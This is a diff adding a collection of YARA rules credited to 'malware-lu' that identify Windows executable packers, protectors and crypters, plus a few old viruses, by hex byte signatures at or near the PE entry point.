+	
+rule tElock099cPrivateECLIPSEtE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 3F DF FF FF 00 00 00 ?? ?? ?? ?? 04 ?? ?? 00 00 00 00 00 00 00 00 00 24 ?? ?? 00 14 ?? ?? 00 0C ?? ?? 00 00 00 00 00 00 00 00 00 31 ?? ?? 00 1C ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3C ?? ?? 00 00 00 00 00 4F ?? ?? 00 00 00 00 00 3C ?? ?? 00 00 00 00 00 4F ?? ?? 00 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 75 73 65 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule XPack152164
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B EC FA 33 C0 8E D0 BC ?? ?? 2E ?? ?? ?? ?? 2E ?? ?? ?? ?? EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASProtectv123RC4build0807dllAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov253b3
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 D8 ?? ?? ?? 68 14 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Imploderv104BoBBobSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEiDBundlev100v101BoBBobSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule JExeCompressor10byArashVeyskarami
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8D 2D D3 4A E5 14 0F BB F7 0F BA E5 73 0F AF D5 8D 0D 0C 9F E6 11 C0 F8 EF F6 DE 80 DC 5B F6 DA 0F A5 C1 0F C1 F1 1C F3 4A 81 E1 8C 1F 66 91 0F BE C6 11 EE 0F C0 E7 33 D9 64 F2 C0 DC 73 0F C0 D5 55 8B EC BA C0 1F 41 00 8B C2 B9 97 00 00 00 80 32 79 50 B8 02 00 00 00 50 03 14 24 58 58 51 2B C9 B9 01 00 00 00 83 EA 01 E2 FB 59 E2 E1 FF E0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Alloy4xPGWareLLC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 02 00 00 00 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 07 30 40 00 87 DD 6A 04 68 00 10 00 00 68 00 02 00 00 6A 00 FF 95 A8 33 40 00 0B C0 0F 84 F6 01 00 00 89 85 2E 33 40 00 83 BD E8 32 40 00 01 74 0D 83 BD E4 32 40 00 01 74 2A 8B F8 EB 3E 68 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ThinstallV2403Jitit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6A 00 FF 15 20 50 40 00 E8 D4 F8 FF FF E9 E9 AD FF FF FF 8B C1 8B 4C 24 04 89 88 29 04 00 00 C7 40 0C 01 00 00 00 0F B6 49 01 D1 E9 89 48 10 C7 40 14 80 00 00 00 C2 04 00 8B 44 24 04 C7 41 0C 01 00 00 00 89 81 29 04 00 00 0F B6 40 01 D1 E8 89 41 10 C7 41 }
+	$a1 = { 6A 00 FF 15 20 50 40 00 E8 D4 F8 FF FF E9 E9 AD FF FF FF 8B C1 8B 4C 24 04 89 88 29 04 00 00 C7 40 0C 01 00 00 00 0F B6 49 01 D1 E9 89 48 10 C7 40 14 80 00 00 00 C2 04 00 8B 44 24 04 C7 41 0C 01 00 00 00 89 81 29 04 00 00 0F B6 40 01 D1 E8 89 41 10 C7 41 14 80 00 00 00 C2 04 00 55 8B EC 53 56 57 33 C0 33 FF 39 45 0C 8B F1 76 0C 8B 4D 08 03 3C 81 40 3B 45 0C 72 F4 8B CE E8 43 00 00 00 8B 46 14 33 D2 F7 F7 8B 5E 10 33 D2 8B F8 8B C3 F7 F7 89 7E 18 89 45 0C 33 C0 33 C9 8B 55 08 03 0C 82 40 39 4D 0C 73 F4 48 8B 14 82 2B CA 0F AF CF 2B D9 0F AF FA 89 7E 14 89 5E 10 5F 5E 5B 5D C2 08 00 57 BF 00 00 80 00 39 79 14 77 36 53 56 8B B1 29 04 00 00 8B 41 0C 8B 59 10 03 DB 8A 14 30 83 E2 01 0B D3 C1 E2 07 40 89 51 10 89 41 0C 0F B6 04 30 C1 61 14 08 D1 E8 09 41 10 39 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule FakeNinjav28AntiDebugSpirit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 64 A1 18 00 00 00 EB 02 C3 11 8B 40 30 EB 01 0F 0F B6 40 02 83 F8 01 74 FE EB 01 E8 90 C0 FF FF EB 03 BD F4 B5 64 A1 30 00 00 00 0F B6 40 02 74 01 BA 74 E0 50 00 64 A1 30 00 00 00 83 C0 68 8B 00 EB 00 83 F8 70 74 CF EB 02 EB FE 90 90 90 0F 31 33 C9 03 C8 0F 31 2B C1 3D FF 0F 00 00 73 EA E8 08 00 00 00 C1 3D FF 0F 00 00 74 AA EB 07 E8 8B 40 30 EB 08 EA 64 A1 18 00 00 00 EB F2 90 90 90 BA ?? ?? ?? ?? FF E2 64 11 40 00 FF 35 84 11 40 00 E8 40 11 00 00 6A 00 6A 00 FF 35 70 11 40 00 FF 35 84 11 40 00 E8 25 11 00 00 FF }
+
+condition:
+		$a0
+}
+	
+	
+rule ExeLockv100
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 06 8C C8 8E C0 BE ?? ?? 26 ?? ?? 34 ?? 26 ?? ?? 46 81 ?? ?? ?? 75 ?? 40 B3 ?? B3 ?? F3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEtitevxx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 66 9C 60 50 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EnigmaProtector10XSukhovVladimir
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 83 ?? ?? 81 ED ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? 83 C4 04 EB 02 ?? ?? 60 E8 24 00 00 00 00 00 ?? EB 02 ?? ?? 8B 44 24 0C 83 80 B8 00 00 00 03 31 C0 C3 83 C0 08 EB 02 ?? ?? 89 C4 61 EB 2E ?? ?? ?? ?? ?? ?? ?? EB 01 ?? 31 C0 EB 01 ?? 64 FF 30 EB 01 ?? 64 89 20 EB 02 ?? ?? 89 00 9A 64 8F 05 00 00 00 00 EB 02 C1 ?? 58 61 EB 01 }
+
+condition:
+		$a0
+}
+	
+	
+rule ThinstallEmbedded27172719Jitit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 58 BB ?? ?? ?? ?? 2B C3 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 C1 FE FF FF E9 97 FF FF FF CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00 00 00 80 43 33 C0 E8 19 01 00 00 73 0E 8B 4D F8 E8 27 01 00 00 02 45 F7 AA EB E9 E8 04 01 00 00 0F 82 96 00 00 00 E8 F9 00 00 00 73 5B B9 04 00 00 00 E8 05 01 00 00 48 74 DE 0F 89 C6 00 00 00 E8 DF 00 00 00 73 1B 55 BD 00 01 00 00 E8 DF 00 00 00 88 07 47 4D 75 F5 E8 C7 00 00 00 72 E9 5D EB A2 B9 01 00 00 00 E8 D0 00 00 00 83 C0 07 89 45 F8 C6 45 F7 00 83 F8 08 74 89 E8 B1 00 00 00 88 45 F7 E9 7C FF FF FF B9 07 00 00 00 E8 AA 00 00 00 50 33 C9 B1 02 E8 A0 00 00 00 8B C8 41 41 58 0B C0 74 04 8B D8 EB 5E 83 F9 02 74 6A 41 E8 88 00 00 00 89 45 FC E9 48 FF FF FF E8 87 00 00 00 49 E2 09 8B C3 E8 7D 00 00 00 EB 3A 49 8B C1 55 8B 4D FC 8B E8 33 C0 D3 E5 E8 5D 00 00 00 0B C5 5D 8B D8 E8 5F 00 00 00 3D 00 00 01 00 73 14 3D FF 37 00 00 73 0E 3D 7F 02 00 00 73 08 83 F8 7F 77 04 41 41 41 41 56 8B F7 2B F0 F3 A4 5E E9 F0 FE FF FF 33 C0 EB 05 8B C7 2B 45 0C 5E 5F 5B C9 C2 08 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv102bAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 96 78 43 00 B8 90 78 43 00 03 C5 }
+	$a1 = { 60 E8 ?? ?? ?? ?? 5D 81 ED 96 78 43 ?? B8 90 78 43 ?? 03 C5 2B 85 7D 7C 43 ?? 89 85 89 7C 43 ?? 80 BD 74 7C 43 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule PEProtect09byCristophGabler1998
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 45 2D 50 52 4F 54 45 43 54 20 30 2E 39 }
+
+condition:
+		$a0
+}
+	
+	
+rule VxPredator2448
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 0E 1F BF ?? ?? B8 ?? ?? B9 ?? ?? 49 ?? ?? ?? ?? 2A C1 4F 4F ?? ?? F9 CC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakeMSVC60DLLemadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 53 8B 5D 08 56 8B 75 0C 57 8B 7D 10 85 F6 5F 5E 5B 5D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RCryptorv16dVaska
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 90 61 61 80 7F F0 45 90 60 0F 85 1B 8B 1F FF 68 }
+	$a1 = { 60 90 61 61 80 7F F0 45 90 60 0F 85 1B 8B 1F FF 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? 90 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 }
+
+condition:
+		$a0 at pe.entry_point or $a1
+}
+	
+	
+rule Enigmaprotector112VladimirSukhov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 83 ED 06 81 ED ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 EB 02 FF 35 60 E8 24 00 00 00 00 00 FF EB 02 CD 20 8B 44 24 0C 83 80 B8 00 00 00 03 31 C0 C3 83 C0 08 EB 02 FF 15 89 C4 61 EB 2E EA EB 2B 83 04 24 03 EB 01 00 31 C0 EB 01 85 64 FF 30 EB 01 83 64 89 20 EB 02 CD 20 89 00 9A 64 8F 05 00 00 00 00 EB 02 C1 90 58 61 EB 01 3E EB 04 ?? ?? ?? ?? B8 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 01 E8 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 05 F6 01 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 B9 44 1A }
+
+condition:
+		$a0
+}
+	
+	
+rule hyingsPEArmorV076hying
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 00 00 00 00 60 E8 14 00 00 00 5D 81 ED 00 00 00 00 6A ?? E8 A3 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule JDPackV200JDPack
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 ?? ?? ?? E8 01 00 00 00 ?? ?? ?? ?? ?? ?? 05 00 00 00 00 83 C4 0C 5D 60 E8 00 00 00 00 5D 8B D5 64 FF 35 00 00 00 00 EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upackv01xv02xDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 88 01 ?? ?? AD 8B F8 95 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VcasmProtectorV1Xvcasm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB ?? 5B 56 50 72 6F 74 65 63 74 5D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule kkrunchy023alpha2Ryd
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BD ?? ?? ?? ?? C7 45 00 ?? ?? ?? 00 B8 ?? ?? ?? 00 89 45 04 89 45 54 50 C7 45 10 ?? ?? ?? 00 FF 4D 0C FF 45 14 FF 45 58 C6 45 1C 08 B8 00 08 00 00 8D 7D 30 AB AB AB AB BB 00 00 D8 00 BF }
+	$a1 = { BD ?? ?? ?? ?? C7 45 00 ?? ?? ?? 00 B8 ?? ?? ?? 00 89 45 04 89 45 54 50 C7 45 10 ?? ?? ?? 00 FF 4D 0C FF 45 14 FF 45 58 C6 45 1C 08 B8 00 08 00 00 8D 7D 30 AB AB AB AB BB 00 00 D8 00 BF ?? ?? ?? 01 31 C9 41 8D 74 09 01 B8 CA 8E 2A 2E 99 F7 F6 01 C3 89 D8 C1 E8 15 AB FE C1 75 E8 BE }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule PolyEnEV001LennartHedlund
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 6F 6C 79 45 6E 45 00 4D 65 73 73 61 67 65 42 6F 78 41 00 55 53 45 52 33 32 2E 64 6C 6C }
+
+condition:
+		$a0
+}
+	
+	
+rule Winkriptv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 33 C0 8B B8 00 ?? ?? ?? 8B 90 04 ?? ?? ?? 85 FF 74 1B 33 C9 50 EB 0C 8A 04 39 C0 C8 04 34 1B 88 04 39 41 3B CA 72 F0 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule TrainerCreationKitv5Trainer
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6A 00 68 80 00 00 00 6A 02 6A 00 6A 00 68 00 00 00 40 68 25 45 40 00 E8 3C 02 00 00 50 6A 00 68 40 45 40 00 68 00 10 00 00 68 00 30 40 00 50 E8 54 02 00 00 58 50 E8 17 02 00 00 6A 00 E8 2E 02 00 00 A3 70 45 40 00 68 25 45 40 00 E8 2B 02 00 00 A3 30 45 40 }
+
+condition:
+		$a0
+}
+	
+	
+rule EXEStealthv272
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 00 EB 2F 53 68 61 72 65 77 61 72 65 20 2D 20 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXEStealthv273
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 00 EB 2F 53 68 61 72 65 77 61 72 65 20 2D 20 45 78 65 53 74 65 61 6C 74 68 00 EB 16 77 77 77 2E 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 00 60 90 E8 00 00 00 00 5D 81 ED F0 27 40 00 B9 15 00 00 00 83 C1 05 EB 05 EB FE 83 C7 56 EB 00 83 E9 02 }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner02DEF10Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 00 01 40 00 6A 05 59 80 7E 07 00 74 11 8B 46 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 83 C1 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHpack01FEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 68 54 ?? ?? ?? B8 48 ?? ?? ?? FF 10 68 B3 ?? ?? ?? 50 B8 44 ?? ?? ?? FF 10 68 00 ?? ?? ?? 6A 40 FF D0 89 05 CA ?? ?? ?? 89 C7 BE 00 10 ?? ?? 60 FC B2 80 31 DB A4 B3 02 E8 6D 00 00 00 73 F6 31 C9 E8 64 00 00 00 73 1C 31 C0 E8 5B 00 00 00 73 23 B3 02 41 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXEStealthv274
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 00 EB 17 53 68 61 72 65 77 61 72 65 20 2D 20 45 78 65 53 74 65 61 6C 74 68 00 60 90 E8 00 00 00 00 5D 81 ED C4 27 40 00 B9 15 00 00 00 83 C1 04 83 C1 01 EB 05 EB FE 83 C7 56 EB 00 83 E9 02 81 C1 78 43 27 65 EB 00 81 C1 10 25 94 00 81 E9 63 85 00 00 B9 }
+
+condition:
+		$a0
+}
+	
+	
+rule ThinstallEmbedded22X2308Jitit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 EF BE AD DE 50 6A 00 FF 15 ?? ?? ?? ?? E9 B9 FF FF FF 8B C1 8B 4C 24 04 89 88 29 04 00 00 C7 40 0C 01 00 00 00 0F B6 49 01 D1 E9 89 48 10 C7 40 14 80 00 00 00 C2 04 00 8B 44 24 04 C7 41 0C 01 00 00 00 89 81 29 04 00 00 0F B6 40 01 D1 E8 89 41 10 C7 41 14 80 00 00 00 C2 04 00 55 8B EC 53 56 57 33 C0 33 FF 39 45 0C 8B F1 76 0C 8B 4D 08 03 3C 81 40 3B 45 0C 72 F4 8B CE E8 43 00 00 00 8B 46 14 33 D2 F7 F7 8B 5E 10 33 D2 8B F8 8B C3 F7 F7 89 7E 18 89 45 0C 33 C0 33 C9 8B 55 08 03 0C 82 40 39 4D 0C 73 F4 48 8B 14 82 2B CA 0F AF CF 2B D9 0F AF FA 89 7E 14 89 5E 10 5F 5E 5B 5D C2 08 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PolyCryptorbySMTVersionv3v4
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB ?? 28 50 6F 6C 79 53 63 72 79 70 74 20 ?? ?? ?? 20 62 79 20 53 4D 54 29 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ProtectSharewareV11eCompservCMS
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 00 74 00 72 00 69 00 6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 ?? 01 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34 00 42 00 30 00 00 00 34 00 ?? 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule Upackv035alphaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B F2 8B CA 03 4C 19 1C 03 54 1A 20 }
+
+condition:
+		$a0
+}
+	
+	
+rule ASPackv10801AlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ?? ?? ?? 44 00 BB 10 ?? 44 00 03 DD 2B 9D }
+	$a1 = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ?? ?? ?? 44 ?? BB 10 ?? 44 ?? 03 DD 2B 9D }
+	$a2 = { 60 EB ?? 5D EB ?? FF ?? ?? ?? ?? ?? E9 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point
+}
+	
+	
+rule ENIGMAProtectorV11SukhovVladimir
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 83 ?? ?? 81 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEncrypt20junkcode
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 25 00 00 F7 BF 00 00 00 00 00 00 00 00 00 00 12 00 E8 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 00 00 00 E8 00 00 00 00 5D 81 ED 2C 10 40 00 8D B5 14 10 40 00 E8 33 00 00 00 89 85 10 10 40 00 BF 00 00 40 00 8B F7 03 7F 3C 8B 4F 54 51 56 8D 85 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SimbiOZExtranger
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 60 E8 00 00 00 00 5D 81 ED 07 10 40 00 68 80 0B 00 00 8D 85 1F 10 40 00 50 E8 84 0B 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule InnoSetupModulev304betav306v307
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 B8 53 56 57 33 C0 89 45 F0 89 45 BC 89 45 B8 E8 B3 70 FF FF E8 1A 85 FF FF E8 25 A7 FF FF E8 6C }
+
+condition:
+		$a0
+}
+	
+	
+rule ASPackv107bAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 0B DE ?? 89 85 17 DE ?? ?? 80 BD 01 DE }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PROPACKv208emphasisonpackedsizelocked
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC ?? 8B EC BE ?? ?? FC E8 ?? ?? 05 ?? ?? 8B C8 E8 ?? ?? 8B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule HACKSTOPv110p1
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B4 30 CD 21 86 E0 3D 00 03 73 ?? B4 2F CD 21 B4 2A CD 21 B4 2C CD 21 B0 FF B4 4C CD 21 50 B8 ?? ?? 58 EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AdysGlue110
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 2E ?? ?? ?? ?? 0E 1F BF ?? ?? 33 DB 33 C0 AC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxEddiebased1745
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5E 81 EE ?? ?? FC ?? 2E ?? ?? ?? ?? 4D 5A ?? ?? FA ?? 8B E6 81 ?? ?? ?? FB ?? 3B ?? ?? ?? ?? ?? 50 06 ?? 56 1E 8B FE 33 C0 ?? 50 8E D8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASDPackv10asd
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 56 53 E8 5C 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 ?? ?? ?? 00 00 00 00 00 00 00 40 00 00 ?? ?? 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 ?? ?? 00 00 10 00 00 00 ?? 00 00 00 ?? ?? 00 00 ?? ?? 00 00 ?? ?? 00 00 ?? 00 00 00 ?? ?? 00 00 ?? 00 00 00 ?? ?? 00 00 ?? 00 00 00 ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5B 81 EB E6 1D 40 00 83 7D 0C 01 75 11 55 E8 4F 01 00 00 E8 6A 01 00 00 5D E8 2C 00 00 00 8B B3 1A 1E 40 00 03 B3 FA 1D 40 00 8B 76 0C AD 0B C0 74 0D FF 75 10 FF 75 0C FF 75 08 FF D0 EB EE B8 01 00 00 00 5B 5E C9 C2 0C 00 55 6A 00 FF 93 20 21 40 00 89 83 FA 1D 40 00 6A 40 68 00 10 00 00 FF B3 02 1E 40 00 6A 00 FF 93 2C 21 40 00 89 83 06 1E 40 00 8B 83 F2 1D 40 00 03 83 FA 1D 40 00 50 FF B3 06 1E 40 00 50 E8 6D 01 00 00 5F }
+
+condition:
+		$a0
+}
+	
+	
+rule ORiENV1XV2XFisunAV
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 4F 52 69 45 4E 20 65 78 65 63 75 74 61 62 6C 65 20 66 69 6C 65 73 20 70 72 6F 74 65 63 74 69 6F 6E 20 73 79 73 74 65 6D }
+
+condition:
+		$a0
+}
+	
+	
+rule StonesPEEncryptorv113
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 57 56 52 51 53 E8 ?? ?? ?? ?? 5D 8B D5 81 ED 97 3B 40 ?? 2B 95 2D 3C 40 ?? 83 EA 0B 89 95 36 3C 40 ?? 01 95 24 3C 40 ?? 01 95 28 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WWPACKv302v302aExtractable
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 33 C9 B1 ?? 51 06 06 BB ?? ?? 53 8C D3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ARMProtector03bySMoKE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D EB 01 00 81 ED 13 24 40 00 EB 02 83 09 8D B5 A4 24 40 00 EB 02 83 09 BA 4B 15 00 00 EB 01 00 8D 8D EF 39 40 00 8B 09 E8 14 00 00 00 83 EB 01 00 8B FE E8 00 00 00 00 58 83 C0 07 50 C3 00 EB 04 58 40 50 C3 8A 06 46 EB 01 00 D0 C8 E8 14 00 00 00 83 EB 01 00 2A C2 E8 00 00 00 00 5B 83 C3 07 53 C3 00 EB 04 5B 43 53 C3 EB 01 00 32 C2 E8 0B 00 00 00 00 32 C1 EB 01 00 C0 C0 02 EB 09 2A C2 5B EB 01 00 43 53 C3 88 07 EB 01 00 47 4A 75 B4 }
+
